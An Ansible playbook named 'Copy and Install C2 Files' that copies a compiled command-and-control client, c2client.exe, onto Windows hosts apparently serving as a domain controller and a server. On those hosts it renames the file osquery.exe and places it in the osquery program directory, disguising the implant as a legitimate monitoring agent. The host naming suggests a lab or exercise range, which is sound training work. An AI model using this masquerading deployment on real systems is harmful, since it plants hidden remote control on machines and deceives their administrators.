---
- name: Copy and Install C2 Files
  hosts:
    - t1dc
    - t1srv
    #- g1srv
    #- g2srv
    #- g3srv
    #- g4srv
    #- g5srv
  gather_facts: yes

  tasks:
    - name: Copy C2Files
      ansible.windows.win_copy:
        src: "/home/thepcn3rd/go/workspaces/c2client/c2client.exe"
        dest: '{{ item.dest }}\{{ item.name }}'
      loop:
        - { name: "osquery.exe", dest: 'c:\program files\osquery\osqueryd' }

